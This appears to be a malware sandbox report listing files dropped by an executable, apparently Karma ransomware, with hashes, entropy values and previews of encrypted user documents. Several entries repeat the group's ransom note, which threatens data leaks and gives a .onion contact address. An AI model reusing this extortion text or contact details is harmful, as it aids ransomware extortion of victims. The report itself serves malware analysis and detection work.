Preview: ....7.....<.0.(....M.......<O....imx;....<l....5pb.D.\.Bg.~l....KARMA....?...). 1|..c..%...b.-L.....y.R7as-@.o......Gx$.......;wS5ZlM..J...j..}.......12......D}..sw3..O.....X...5.t..^..p... ..=.P....O.)(...$...N..Z..E.+....E.^Z....O.2B.7.aCE.`..o..>Bb.].......V.e.Iq.V...S|.S..wUj.q|..Z..4.-.}...%.!.o4...).u...y.=.x.LO.......8. "..V..t".=;r.hpG........MQ.>'..Y..q.[J..'.Du....uo..$..'. ..p.Sqi...o9..a.......?Or.............v)..$...XIF..q..5.Z..[G..vyd..N.7.6...6..C;.tA2..r_r....u.9.F..`..P..`.a....$<.....24.......F..N..s.S.H...]}...d.u.(el..j.R../...T....ln.,......yC.O.$\{...3.k.s.....b..././...x....eP..w7..'l.J6.m..S..x...{r..s..~.i.....T..N...~.....].......3.v.8.oK...f..2..a.XL.6...x....7.)....WZ.8}...w.2b6.t..S."..].A..,.....Lo......>.6.....:...3.Q>.../.. A.B*9T_........%b.T..W/....wg..du..6...5G......k..T....z..$.0O$.R4Q7.d.:1e.F..3.`.4^<.J...<]*~k.y>....o.E..`Z.n...f.Nf.g4.#.o7.),~.%..J}../....K..n..V=.".k...g.....O......h..,..
C:\Users\user\Documents\BNAGMGSPLO.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.798729109296202
Encrypted:false
SSDEEP:24:KgftBdZeNSTYGQTJF8UavbNWkkVk3XPt9pZ:KefYSTYdSNWkkC3XPrD
MD5:AC9A0B8D2CBBC0A80BB999A18361EFB3
SHA1:F0BB870381F3E21D8C5B6A02FB95B785D363657C
SHA-256:765138565F06A3DEC53D15BE016837E52F97DAA6726352768CD9CBE0A1B64D34
SHA-512:C2ABED670C641D12420E80EAC498AA87FF79E178992F3D8F39BBF5F5882AF77A752DDB4F17E922CAC79BD6690967123E76C3850DE0C9F47B206AFDEA0AFDB595
Malicious:false
Preview: .,/.\...?.l.-8|;....'$<.....~(...........?..?..m.[..e..?...KARMA.F.laNo*o....1.q8. (.iz8<>.......H....4m.M...X.1............E^.....n(.....{W?...O..h....(......\..U...q...M..z..W."^?o.6.G5.+G<k..Jk.|f.[B.)...;_..R...p)....R..k.o$.Q...07...w.I>.\..%.........);6H.<f...}G.o.T.....$..k.U]..~......A..b...{.g4=...F*UXA.[_V66....U.~.mX. pq..>..\5h..Dm...v....\Q~zZb...L..B.......'.e..B..5u....?....T.2...m..3(...K...+.j..OY.....Z.0..b .>.M...o..G2(...u.H.:. GDGI,....F.|..G..6.3....)v.8.q.."....jH..C."...Z..Q..sU3k."mA...F..nf.*.I.. o.$-@.....b.....M...J.)......;UVR.+.....-%.....t..O..=kGVj...|..H)..........'....Q...Z'r.......2..qFED^.7....c5.C.T.B.}!.0y...q.q..Tj...m...gZ^N.'..../..".<Nc2.Qn....4..U..].~...J.|.xk...=/G.i.eeoryE.{.t=...@.%.......k.5.(.'}...I...n....$.<g..m@..3VtR....3.x.s$T.....K.[@].@$V..FWR.i.x....[e.[.........f.JT......W.n...&.......2.....%...H..eJs.~.<...._.....y.A..).U.B...!j.&.z..<..F..G...L....N7Vzb.l.h.S...[5.......N.Ub...=
C:\Users\user\Documents\BNAGMGSPLO\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Documents\DUUDTUBZFW\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Documents\EEGWXUHVUG.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.807179350599828
Encrypted:false
SSDEEP:24:BRJ6PoB7efny4CIFGky15tbp6PbqwSq9Y9bE0bNpzziHLl7uAvMfi:p6PoB8yEGkyPREP/l9EbnpzzKvN
MD5:C34523ECF1594EFCF11DC45D9F470BBA
SHA1:2F5999B8D5B82821CA3E0D3311D0D67E3229AC78
SHA-256:B504050A55A0BE33C2563E623EEE097193748722FEA26CE413C501B8B4990150
SHA-512:F900B285D7191875856A9A61F568BB01F1E0F2A92881AE2E5CF8F1267475F760EA7093ADC303C1D9E6C730AB3D600C7318FB5BF721A19C1DD6F12A64B5F14AC1
Malicious:false
Preview: B^.y...*.D..-....P....r..rU.......!....6.U..t......p.PVe*09...KARMA....6.o.........S...........;V..%iT...Le.l.....G....xL....JC0Q..6'.6 ..2..w.K.Ah...E.0..0..M..}%....A2..V...u1,'....x..\3'.4s%l.i.%+....d.e.5[...-..pz...I..n...R....#...w."..?...Q......S..X...0.va#...H.V.<....Rq.}...1L1.^@.G.2.E...V..].....$.-.......|../..V..Y...N">..@9$...u.luP..G.'..+..Y.!".p._.....!'...=..T^.D0.EBP1.....[..L"r.Ef?.....zQJ..v.gNk..~.I.;...<...;..J..6Tut....c......l.z..`x...9N.MW*....2.......4..c.Yt....iH;,dKPi/.A...Gm.t.I.k..S.`..4..te.&,.;}.o...$.p#.s..{...;..d.l..R.,.)../....S.W..4]dA..y#>?{ S............Q......?.,...*`7..,.....m.V)..M#6#.|..&^^.6..]wp^...H..4.Y.....YW...9.w......n*W...^.jU.F.X..4...e`Tmm.B`X.WS...(<.V....C.OK*W...^..}.7.'..q...!.......e.C....S..d,....9Q,.Ky..CP..0./.......Q..q....._4.Q.....M....A.9\..B......H<.5e4.H.3..O.....*&1<.Z.;'.G..A.ns.J....9.b_.1.~+....5..tQ+..:(&..D}..H..Y./&);..5=B.+&k...lh5.xV.N....XR... ...g._BV.u...V..)c._u
C:\Users\user\Documents\EFOYFBOLXA.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.808229798797674
Encrypted:false
SSDEEP:24:Py6HzcPt0fhLlnbwA7t/uPjUF3BCEt6Cm+sg2fVl4DytUw2Y:PZzatchLlnbwA5u7UF3t1l25iY
MD5:E0BCB0E19DCF4D66D9386AFA3D2D8572
SHA1:DBF9AFF1277807C92E41764B0F4C0D60C317917C
SHA-256:5A5988D465B3713A7242620003A20835EAF4D45369CB5CDDE6C4671D54B2BE56
SHA-512:4BDD75967F754D6E8E6EAA44A213ECFB18EE050118B337731BA26D13480546E9842D02B1AF7DF1B42BC04A9C02BAFC7D413250461F64035706E6618144EBDE3C
Malicious:false
Preview: L.afA)....0....RF..l........3!..|1...{.O}..nn.^.....dcq....KARMA.<.-.+E..X~.^J/..2%.&...,.S...\.e....[G.7..)K*..h......md..p.M..n|.Mk..v....j...#.....:.Rl...!7:..Q...8.X.g.eI.8e.+.kl....l.c..^.3G.....J..8Q......z...<..R..Gf...b$tE.8|..hf...-I^.s.Q]k.\Hr=.....J.....qE@(.l..I.).V....\...3.6.C.#l..........a..qU9.X..(......2n......7.&.....:.:....?..n.u.ql}.k.....G.(..8..z..P.....+..Y...R.........;...S.u.F....w.K..........~.hS?......{.{\.tW8....9...}4.^..^..-3...#]!Y..*...d}R&U....v..,.D.l..D!M..........t.icJiq.0.Og:.^..G.Pa..l....2..,.......B^..v.!.r1c.4.".A.......X...^..z.........#.C..._.D.s..u...t.y....E.. $.K..-..2.t.JRW....c...w......X}trn..|...p/-.(...Tu.?.. ......9..P..la....b....`.`.1.....5..\O..adb.S...m<R..#,V..&...G..=p..........h..*L......i..uR)p.+....'.FE=.s.#.+W.'G....q2.op,.'{1`y:.!.e.NF.....qV..jw.....I.....@..5...K....]..c...5.a.n..%b....>....X$ .B...VJ,.p6.j..A.D..o..:..uo.dZ0..7.?V\...8........*<.S.l...i...j8W.g...`|@`3.%]o...
C:\Users\user\Documents\EOWRVPQCCS.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.820764315499837
Encrypted:false
SSDEEP:24:1BxPhz8B2uFaWKi8VTqB3OnIPgU1VTQHz4EaISArtT5t:/IB5Ci8U3OnogUnTgz4Nwrhb
MD5:F0E2463BE3320B989A2101E8DC426920
SHA1:32CC532557985E757965BE70F50A0A15DC8F30D7
SHA-256:15703CAFF9B47841C9BD7DA3B0714BB97F6654F025063A5E1C1CB6299B856A6B
SHA-512:FAE3EC695914C208C7438C0922A14E15B47C16592F71468C3560F5F02C6771563985DD4819CB6CAD875266C03C71FAA3251BFE50C7BF583DF8A3EA362F7E505A
Malicious:false
Preview: w.....4.h.ZM.12<.wNp.~j$..#....g..qkQ..>0.b...Z..!`;...]...*...KARMA.c....x..1$... ..'.}..3Z-.g......PSt...t.C.....J>v...SBx...L...5../.D.a.N....T..[U..Y..H.R.....l"Uu..J......m....T?>..B%..o..K%..B..t.6...`.W#C~.LVl..b...<..}..O.....r...?m...n.....o..X....k..=..4.l.:!.%t.-......s2..t....o;JP'......c.4.,.....?..].......c.. .*...We.#@BR.C=2."'e.3..8SUs)z...o|NEe..A.....$.d,V....j9i3..@Y..C3...D... ...".t.zO..z...x...S..gAc..$...v.....|......6...P..z....u0;.?.._$e.....1..+C..B..r.r.J..GU...#..7....J...GW.....u.T.0.>.....B.h2.j........nU....B4.k.!.j'.2...]...wR.."...w.{..*>.S$.......v^..Z.z&...+.|.....b>uU..n.m).m...I.l..rr.I.>.~..(u.q.....dI....m.92..S...L._.|I..i?...:f..2..x.....5.]......6o\..,..H.b...+,.,{..P/..o" .g.'T.2)sE.,.....S)`.B..S&>.....1+.YU....+...4...<....eQl....J.S......><..@c......h....I....q.[iM.?...7u..o......^.....B...h<....m.]w..RT...`...j)..._.....'..\BS.4.ER..N-.v...B....$.......3. ...../r.....5l...$..~;a.....YO........u..
C:\Users\user\Documents\EWZCVGNOWT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8309656220719575
Encrypted:false
SSDEEP:24:kvnBe7/TS7GrIYinLEnQpmN06IpOr7h202UUEoj48G9:4nBe7/e6rfiwnXu6AO3kljjg9
MD5:50C5BAB77C71B5636CEAD09194606F7A
SHA1:4A272025FD2A92CD26FDCAD3C87162560F9C5FA5
SHA-256:8687FFF0371544BD5D4A1AD77D62F6C043C9070C928129922F575E9ED0B1AE32
SHA-512:4C3EDE3E0DD6FBCC3D5CEB9E97E94C7CF8BC314F7B42809C77BE610AE8A2C20E0D14423AEEC5A7BE30D853F8BEC7F887E4EFBD626EF2753C36AA2775D8B6CE2C
Malicious:false
Preview: .Id5..1z......,.....-.<.].....'.......,...}B#..^..`.z;......KARMA@Z)q...^(p.l.n:.X.#.........R.E..5..a..5.... .L.Pp.a.."$...T}D.I.As..^.."..=&^;F..u.._.1.gL#Sk.,"x.....>.`.._...........h.Hl.U@r..&^.....}v..Jx....r..D...`.......K..g......T+..+.71..*~..[.+..)..x....t..|..,rsa.~..`t.X~,IV9....M..R(0...w..K..,..b....l3.. U..(..i~9...RB'....Q...t.i(.....2......{."a..>./.er.e..D..`..ff.D.\...aF...++%.....O.J..m..?.m...R.......vz...4.i..}..T......1..V...M......#.,..l.b....D..Ie..t..g......[s.M..yW.....~.J$.:(.O..G..{bt8..(..3;.}P.T...&..v.|....C...&....._^.&..A..........;E.!C..7.&..Q}.....(.P...|K`..B.&vP=D{..R.3<>L.V~.....&..c.CDE...S..e...a)M.DO...P.k.....nX4.n...}.s..]....5:..=..Y:...\m.p..\..t.../K}.G....."..M...<..).].0.c...'h)....K....+r+...hq........"......s$.g.)...Q.*d..<.. x.O..}.";..F.H!..R.s...D<..Mk........:5...[..5..)...~}.z.6*.g=I*.4.q.'-d.a..A .h...P%hM...6..Z.....0M.u>l..K.....\.*...D?..x..~....._q....e.?..+.h.7jDv......R"...$..?.>L
C:\Users\user\Documents\GAOBCVIQIJ.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.80717479311287
Encrypted:false
SSDEEP:24:KKyoR0yYmBixtK97eGkNNXFgzzXP423Y8wEb+WcwNNk7Er2:KllfWHo2zXPNInESma
MD5:01CF78C85B368E01A5D6746C05971D08
SHA1:DB13E5E8523DE58640AEBBA82C66AEC34BF5C6C7
SHA-256:B353236E5E7914DE49D939F02CF57421CCD9C350D0E30189791AB33BDF332A8E
SHA-512:7D99E7B1927348AB248B6845FE3FEF150C7DC1E2FBF21718D3B073C85AC9866AC6B5B09838264687978273F7E8AA849A8E7C733E4BFB604F8BE2FCDD596790E5
Malicious:false
Preview: .@/.3U.G..a.{.....d'..I...x&...d...I..f7a.fIm.q....7...r.`...KARMA./n.k......X......"if..U..f......j.c..._...t...5[^)......1....DQ&G......Qie....0.....6_V/m~.9..e.......Z|d...!.f.c./....S+.......sd*.......v...`x.)....LI.n.%..I..S.#.;.....`..|p_B'...+<6........'....530..7...7......[...J.N.D.}..[D..<-.....5.5....N*A.`.....=./..s=.4T.e...r..T.-...GOFN..&2Y.......t...@>Cy.Z..K..a..H.mB.^C.?T%V.k...7W...$.....r.....`,.\..%@...bf@. ....6..s.7J.>..1.&R:.~...r"r..O.B.3....M/S.q.m.IA7...+b..y;jCo.w.l&6.(n....J..........cB.nt...<. .w.w.".....S......j...6<7..Ai..0.O\j.oQ.....'..IH+..(..9.3P/q>h.}.&.....7w..U5....\...].J..]5..40R.q.e.....q..;`.a...$.....\o.yN.. 7...Kx......v3o.RE..f.$;$..#...<..A..3...dW:.....S.Q.#.y....f..n..T.....fS/...:r..Y..!.t|u;.B..GI..l........2..f.VZ...>I1...gt.....3..w.LJ.Y.>......`s..(;..;eOq.t.8$...Zc..k.<...A.$d...Q...m.I.}....w.M...8$Ne....Q..YAr..BN.%...wh9...$I../.ob.Q..0..J.H[..s.."s.K...2S..i.h.".DJ.s..v/9.J,...I..
C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):1095
Entropy (8bit):7.8280602413678
Encrypted:false
SSDEEP:24:j0rLVK6HOyiQyifFr7LAHebKgqDLh17h9lHbU99M4hZ:j0rLE6uDaPLAHeGvDLh1nFUr
MD5:BB63825AA70EA0FDD2818D2A7B166363
SHA1:35DFF0E9847C8C08DB5E7BA9C3F9DCB87908E255
SHA-256:D39AF3E5304EA32355808EF46535DFF3760E4B118FEDCA56607C78C09711A24C
SHA-512:3C2F8DD35BA949D31DAD4F48C35180BA7C6B443A227B9A02949F65B272AB2AF59C467EDCCA7D0B3DF779D5430EF45140BA31B2CF841A3A247846AB0EEB6A171A
Malicious:false
Preview: ..2...R..z..)Yr.p..oa,..gR.......eC).% u.!h.F........:...uF....KARMA....n.w..e.h..u...gi.F..#.Ko...P.H........S....I#..-..)...\.....6C...{V.}...w...h{G.3l|_7...K,..+.P.:}..1.#lT.ux...Y/..Hg.#O..!...../.......F..;.`..Y#r...`..5y..y...{..V.....zp....HR........8...,o..YMA.4........?.Ytc.r..%3.0-..!....a2at...s.M..Z..J....<..jz...et..l...+.(..+.O.@....rJ.?U.WB.V......ZA...b*Z-..O...^)X.4:.Q.q...h]..q.....1:.*......@..<.3dB^.6...Dw!.Df...b...x.d.........wlUE..k EJ.r...#.%...'..V...........3. ......35.p....g.I"..S...`..Dx...C.$....v....@OimzT.<.....i..zpu..{..p.B*..Z.....r.....6......b.8.......MsW.*b..K..Q.l.[#..?d...*..{...QsZ(.D..kFy...bt.....j-JC.Z..l\7._....jT....e.@..!.d._KG..U.I...<..X......R..-.....4..v.5<7...I$......S.....j.iFTO........i....>...\....J8.I.....=....H,......'.....:..N......8...O...#....%....7..o..1......7..2..:.i ...D~..kx.....^.....]..L...zd#M...........o?KOw..J..6VF.u.=....X.k...CV.....2..i....<.E..m.N.I..a... _].6
C:\Users\user\Documents\GAOBCVIQIJ\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Documents\GAOBCVIQIJ\PIVFAGEAAV.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.827362631974762
Encrypted:false
SSDEEP:24:JSh+v4MIeFnMoPOjiTmz1uPkqI0u5pceikmDnp9o0CE720V6/cTD:JSKxIeFnMorT97I0hlkm40V720VL
MD5:60916CECAF96353BD206316F41567952
SHA1:6A0F0C4529A076A7F9DECF168526F0891837AA9A
SHA-256:17D31B810FF5703EAB936E8BC14325D6AABEC048C68D18D0BBAD376C6B21903F
SHA-512:DA193A154467C5C5B2D9CA2E302E3A949EC57B9BE3882602C202E0B117BF3F92ED4B70D9F8D3690BD9CA6B4E21124B00389A900120F05C017A0CE20C4C6E47F5
Malicious:false
Preview: .? q .A.4..8....!S...T...w.y........ls....V..GM...X.h...M..F...KARMA>....q....4/8F..Q.rY%=....W0....Q..e.r.....:..h!....F..O1G...?.o.K.6..{d......_.....t..3R7....Sn#f....Vm0D......X... W..T7Mz......'51..u.`.r..w/s.s.9F...^.`.._+..X.=.......s...'..mo.{....fb.^...*.......W.[.?A*.F.n[..R.]}.&_.lW..p..w:.H.!pQ..G...C....C.(V.K....}.N..e..^R.uHh..E.q..[.~X..CZ.F.jv...lB..8..>...C.. .'..C@Y[)I;..0j...f.=e.B.f..)Ni~P2........"..2`.p.R...<......-..7 . .G.HA..F.."....,*..+"v@..Uw.P........o...P.dm.h.j.(.W.e]e.~.......$xz.@;pA.%4....... .:3"\U#..%%}...........f.`>.L.0....i.lv.*.A...J...p.n....x.|D.+....e_.$.c.Bl.0}...9'..F...$.!mK..v../.ma..O......al.9.....l......kE]t.W5.-rO......Tg..5q[-nH.?..@...(7...h0..V.....>I..|.....R.....bO..F......>.."....8..B...Y<......xg.....G.sN8....c...9..-&..+.E.#..,.K...bo...K......T}'.u.c{.YG......^.Z...M.h......3.B....*U.......X@*..l-..@0|.`.X..^].R;n.B..L.7p.g.......X.W.d......o~.l.F>..E.;...S.e.+..l../...V.Ox.F
C:\Users\user\Documents\GAOBCVIQIJ\PWCCAWLGRE.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.808696676583605
Encrypted:false
SSDEEP:24:CsOtEhpeQyQDne9J0oxPV0RI7gNSL7Nl7HlZQSkHBD8slEdI:CFnQL80r8L7Nl0qslEi
MD5:62A3150DAFD2222B09E019BEB187C7C0
SHA1:528260B86AA2DA8615B1367C450F4EFC850F1416
SHA-256:1780B6E965FC7850F52D888090CE09866204EB5C6A56362B8547FC671897EBA1
SHA-512:1E950212A4708BC16E4CA6AE88FF21C9F49CC9D46C3868A3A2FCFFEC65000B2BB2D455D917A04FF6DBD9627200627AF82362F4D7E5265E35EA4261FD3BFD5F5E
Malicious:false
Preview: O,4......_P....W[1:dEn|....sw.....K..I..|J..u.........:.a..X...KARMAjBEpLt.u...-....q.<I...S&k*y_6L..u@...y.+B...........dm...,,jT.dP.._e3.h......k....=1+Ek.......)vw....5..9......R..E..C..9.m.2.m/.y..u.8.G[.V4../..04i.......j:M.h...{...J.t........)...)&\....CO...r.!..3..*...vr.....L.......J...(.w$>...VQ.5...4..|..T...+....._.0.......J...y...A.....2G..8/-....J...?u..cLb.MSV.O.@.H..'.H.P..\.A%0.....Z.L.:.u..er..U.&.y.....7..*..F....%....p..y..j1U.).h7..........4.v....6.3}..eT...Y...C2....+...........g..5...0.=.A..Q6I<3X.01.>...7.......m...{.h.o..k.bZrW......iX$"....<.0...."`.~......f..&..G.+E.V..M......vP.w.A...Zg3...8.u.......oJj...&.\...!....k....E.1$9.i...u....;..x.&8.p.v.t...ui\.u..n.A.}T.W..0....ZV......z.$^o.y.....Y1.{w.....7.F...m. .V.R...@.._...^.p..|..n..%.e.n.$..X4u.Q.....d,.<...b...i/.L.j....$.b..o3..0.S`..`.[..`z<_\...8..VG.|.B.f.T.SsEgTh..*.8....t.......2Z.......}......vm......../N...M.s..!.E....Y..i$.../8..[ ?/..*4.c....6a4...!..t:..
C:\Users\user\Documents\GAOBCVIQIJ\QCFWYSKMHA.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.829407730277449
Encrypted:false
SSDEEP:24:8xh05gXWzCvDWELX+chpfslq98IPbHHqHvcZcOM7cvOVWcI9OMzdBY:8z5vynwslqH5j6cv3jzo
MD5:B747B90642ABF6FC3443E8EE92FDEBB3
SHA1:660E8F35844CFDBF15EB14D3D90BDB2F191A5938
SHA-256:4DDA8BC948807C6DFC1E966472226EA47C8F19E16ECCCBEE49DC8F07208FAA16
SHA-512:48C6C628AD335E79347F67FBCC98CF27390FCD14BC1C23A4B7FF8790020C3C4631E8E8E82D2D8AB49D703EA8338E17396227D999D1C8D34BBB689D0CD7570CEF
Malicious:false
Preview: ......:....d..z.Z..r..^....9...d.s......SS.2..AQ....2.F......KARMA0...[.R...:.y....PB}.GC~.k..BBn..._~\*..N...h_mJ.]..mu!...z.0..JO....2.9...?.cr.@.1........%!.*HN.C..W..:+7.~.uR....:IR.:P..%G.O.:.j.I..5`|...y..*..<x7..f..SHU2u..kR....%....A..a.C.A..=.~y........3S.6u.:...D..C..09.T.....g0...IR..aDdX..1B2.j_WQ<\.y.H7. E......*A.}}..Kt..0..r..$..D..4}..........~..{.M[......a*...:...4Q..U.....@.;_2..|...r..g~....`KA..1..J.cw..z..Y..C.......Q..*..Z..e..M=7..Q.vj[.p(ZT..."|..N...d.....H..@..R?^#>./.\.dQ......-.J.t....e..R]......I...'.pi=F.:.X...M...M...Z..$|z.m".@.R...9......!.m(v....J..GL.S. .".9.?n\..nL.).p ....l.,.8.F...9.5.#p....l...B.......N.E<-.zr..VI..4i'./..'.zr..YV.......w..nw..".....2H/...]...m.<l.5....}{(E.......M\.Z.>..No..[.......U..@.t.1...y..D...Y..H;...y.~h....gTc.4AE.....6,..r?.&!...[?.$..2..x..S...y.\..._B....G...~..GsF...!..q...<"............$.r...:..gy.A..%q....[>.+..f.g...k,...[fhKOp.l..T....d....\.....3.2.uL..C
C:\Users\user\Documents\GAOBCVIQIJ\QNCYCDFIJJ.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):1095
Entropy (8bit):7.82386632332941
Encrypted:false
SSDEEP:24:IHk8+GcDHniisYnRnCmg9ZnVl68ZW/Q8h3MxBXCPN3wb2JRLUSrtZI1Ma8TQm:IDcDHbfc9V6878h8xBXCdFL8m
MD5:FB0FDE172152ACF3F59EF31F82A4D7B3
SHA1:79CD4678BF5A9C42B5ABA072394CD0E54054C72B
SHA-256:947B0357AD66757135B3EF5150137A1742ECDAF610157C4C9B6ACA302D078461
SHA-512:C4B6C8D17528055991E71BA3D1736F495ABD96A6C4E92835A0FF2FE3F74C49D36428C5F58742D63B66CB4A8A065224EF3B3B0EF00E5664EF7D73CFD96CE7A5EA
Malicious:false
Preview: .S.5.vf%%&.T.<`...4...85l...g....9.......SP..L.`.6..U..I.c...KARMA;......Q{......T.@Z.F..........;.g..*..F.i.XD../.[...yzl. .*..~.....k.ZX.....;.]\.s../6..+.......I....~.|v....E..*..H .....7....r\..hEw.l.b.....OS{]......{..x...d...EW!Q..:....4!q.fH.[T...?...P...x.7&.......-ct..:.xtB..w..2.O.Ik?.?..&.8}..=!5l....m......s.G....._.X.W#..c...p.W..a.M'.s.._'.>.n-....&..o3...uUw.7....0...em.b..pF...;....Y,m2..$..bR..".......{dZ.A..(....V...G...= .....A.H...- c.,...z.N...8%.Z.E.x.JG...h.m}Z...]n..3....9.*..|..Z.....*..`Ln....s...%.-.".TQmf+<H....|.z..?....;!D-z...}u(..7..!...O.q..{.r..R+o?>=o`.%..3.3....r{d.y.$]..w<$..y.m^."shK....2..&.....&'......sv.S..R..@z.1Hw}2x.R....W.U..\z...h..}XU.....@..9... ..X.=.....ek.-.c...r..\U..z;.L.Tv.aU\.....kfD..Sc*...k.Su.y..D.."JP5......2[...L.d..X`<...E..............N.E.n...dP..O.....J..]..2.D@{t...]..i..."[.Bt......=Ubv`.....j..-)l.].."....H/v.{.>a.x..1.I.......+.q..N.+.^F5.J....ON..7F.Yz.t/........ ..|.>..-..x
C:\Users\user\Documents\GAOBCVIQIJ\SUAVTZKNFL.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.799274125397833
Encrypted:false
SSDEEP:24:++uVUcj42JTf8RUhWVa9sStZU3fI2zSa1D0dbWnej:aUc826uKhS7UPZFhM
MD5:2D2E181D2E2B0A562D5723561FD981E9
SHA1:AFA30B68377692962D6ED12A66392023DE66D357
SHA-256:6EFB83DC68B27A9312AA0517C12ECFE6700032AAC64630772AC0243E60D49FE7
SHA-512:0DC836DF357FADA57C23158F73338B24F9C1118989147C0CC957C5AA7FAE3C251EFA23648F7E38BF282B0FD0FA22D58559291E23BC86285C6C3030035180057C
Malicious:false
